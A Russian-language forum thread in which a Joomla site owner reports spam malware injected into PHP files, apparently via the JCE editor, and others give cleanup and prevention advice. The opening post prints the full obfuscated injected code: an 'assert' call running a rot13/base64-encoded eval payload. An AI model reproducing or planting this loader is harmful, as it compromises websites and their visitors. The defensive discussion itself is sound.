Инфо Уязвимость в JCE Редакторе

[tryuk]

Недавно столкнулся с проблемой в виде вредоносного кода evan или even... забыл уже. Может кто писал об этом уже, я не вникал - честно. Но решил проблемой своей поделиться. Так как у меня это первый опыт в борьбе с этим вредоносным кодом - я стал читать как от него избавиться, что он из себя представляет. Зашифрованый код практически на всех моих сайтах успел появиться в различных директориях и именно в файлах с расширением .php.
Выглядит вон вот так:

//###=CACHE START=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvE1pzjtCFNvnUE0pQbiY3q3ql5gnKEuoJRhpaHiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVzRmBTWvLJD2AJZmMzL4AwuxAQR4AJWxBQR4ATLlMzWvVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVaq3ql5gnKEuoJRhpaHvYPN4ZPjtWTIlpz5iYPNxMKWlp3ElYPNmZPx7PzyzVPtxMaNcVUfXVPNtVPEiqKDtCFNvE0IHVP9aMKDhpTujC2D9Vv51pzkyozAiMTHbWTDcYvVzqG0vYaIloTIhL29xMFtxqFxhVvMwCFVhWTZhVvMcCGRznQ0vYz1xAFtvLGZ4LzWuMQL1LmAzMwt2BTD0ZGt1LzD4ZGt0MwWzLzVvYvExYvE1YvEwYvVkVvxhVvOVISEDYmRhZIklKT4vBjbtVPNtWT91qPNhCFNvFT9mqQbtq3q3Yz1cqTSgLF5lqIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVzWuMwqxAzH1VvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###

В интернете я конечно нашел решение проблемы автоматизированным способом, в смысле через командную строку, обнаружение кампом и тд... и способ замены кода или его удаление из файлов. Но в некоторых статьях так же писали о случаях что вместе с вредоносным кодом удалялся и код скрипта. По этому я решил старым добрым методом - это поиск тотал, определение уникальности вредоносного кода и замена на всех сайтах (почти 5 гиг) через Dream Weaver. Ну все получилось, все хорошо теперь.
Этот код выполнял спам. Способом сортировки от первого файла нашел уникальный скрипт где как раз писался этот even или eval... не помню точно, удалил и не сохранил к сожалению - где впервые был размещен этот скрипт - он был размещен в одном из сайтов в компоненте JCE Редактора. Не знаю где там уязвимость но это просто мое замечание и вдруг кому может поможет это сообщение.

 

[Genk0]

1. Нужно пользоваться только последними версиями расширений в том числе и редактором
2. Не факт что виноват jce. Могли залезть откуда угодно и встроить код в редактор, чтобы при его запуске была рассылка.
Ну а про методы поиска вредоносного кода на сайте полно статей в гугле
Пользуйся тем же самым айболитом, покажет тебе все подозрительные эвалы и прочее

 

[Avalllon]

Если вы пользовались какими-либо коммерческими расширениями или шаблонами, найденными бесплатно на просторах сети (а 99% пользователей делают именно так), то можно потом даже не удивляться наличию вредоносных кодов, шеллов и т.п.
Перед установкой любого "халявного" расширения на работающий сайт просто необходимо проверять его любыми доступными методами (я, например, часто просто код глазами просматриваю, файлов обычно не так уж много). Очень полезно иногда скачать один и тот же компонент из разных источников и перед установкой сравнить файлы - разница бывает заметна сразу.
К слову, иногда сами разработчики оставляют себе какие-то лазейки. Помнится, лет 8 попался мне какой-то бесплатный компонент гороскопа, так в нём изначально был бэкдор. Сейчас это уже редкость, но всё-таки.
Также возьмите себе за правило, перед установкой любого нового расширения на сайт делать бэкап. Это никогда не будет лишним.

 

[paradox-ds]

JCE сам по себе очень дырявый, особенно в старых версиях на Joomla 1.5-2.5. У меня два старых сайта на 1.5 постоянно взламывали и код заливали - уже все защитные меры принял, ничего не помогало. Потом удалил JCE и взломов больше не было, значит через него заливали зловред

 

[tryuk]

JCE сам по себе очень дырявый, особенно в старых версиях на Joomla 1.5-2.5. У меня два старых сайта на 1.5 постоянно взламывали и код заливали - уже все защитные меры принял, ничего не помогало. Потом удалил JCE и взломов больше не было, значит через него заливали зловред

Тоже удалил этот редактор и все норм теперь.

 

[LE_Hong]

JCE сам по себе очень дырявый, особенно в старых версиях на Joomla 1.5-2.5. У меня два старых сайта на 1.5 постоянно взламывали и код заливали - уже все защитные меры принял, ничего не помогало. Потом удалил JCE и взломов больше не было, значит через него заливали зловред

Joomla 1.5 сама по себе одна большая дырка. И JCE там картины ни сколько не портит, а скорее дополняет ее )))

 

[Alex_51]

Потому пользуюсь бесплатным редактором RokPad. Спасибо за наводку про AI-Bolit - буду пользоваться.

 

[Fassendek]

Отвратительней и глючнее редактора, чем JCE я никогда не видел. Работать с ним совершенно невозможно и неудобно. Это как современные телефоны - всё есть от фонарика и до фена с утюгом, но слышно плохо и тебя не слышат. Куча наворотов совершенно ненужных. Для джумлы есть шорткод который делает мыслимые и немыслимые вещи, а редактор codemirror меня более чем устраивает, хотя почти только через него всё делаю. RokPad тоже есть, как и много чего от Rockettheme, но codemirror люблю больше. Мерзкий JCE удалил на следующий день, поняв для себя, что "мультикомбайны" с подозрительным кодом - это моя блажь и лень.

 

[GeorgeZ]

Отвратительней и глючнее редактора, чем JCE я никогда не видел. Работать с ним совершенно невозможно и неудобно. Это как современные телефоны - всё есть от фонарика и до фена с утюгом, но слышно плохо и тебя не слышат. Куча наворотов совершенно ненужных. Для джумлы есть шорткод который делает мыслимые и немыслимые вещи, а редактор codemirror меня более чем устраивает, хотя почти только через него всё делаю. RokPad тоже есть, как и много чего от Rockettheme, но codemirror люблю больше. Мерзкий JCE удалил на следующий день, поняв для себя, что "мультикомбайны" с подозрительным кодом - это моя блажь и лень.

не надо обижать плагин. хороший он, но для новичков. и именно поэтому он настолько популярен. когда начинал знакомство с жумлой его поставил и был доволен как слон. сейчас аналогично ушел на codemirror, т.к. читать код стало гораздо проще, чем разбираться в верстке аля ворд.

 

[Fassendek]

не надо обижать плагин. хороший он, но для новичков. и именно поэтому он настолько популярен. когда начинал знакомство с жумлой его поставил и был доволен как слон. сейчас аналогично ушел на codemirror, т.к. читать код стало гораздо проще, чем разбираться в верстке аля ворд.

Кому как. На начальных порах я его ставил и тут же удалил. Чтобы изучить что-то, нужно в этом разобраться. А тут сначала нужно разбираться в JCE тратя время. Проще всё самому делать и код научиться писать как положено. Притом плагин глючный малость, был во всяком случае, спорить не стану, новую версию не видел, но коль жалобы есть, значит не всё так здорово. А всем новичкам желаю удачи!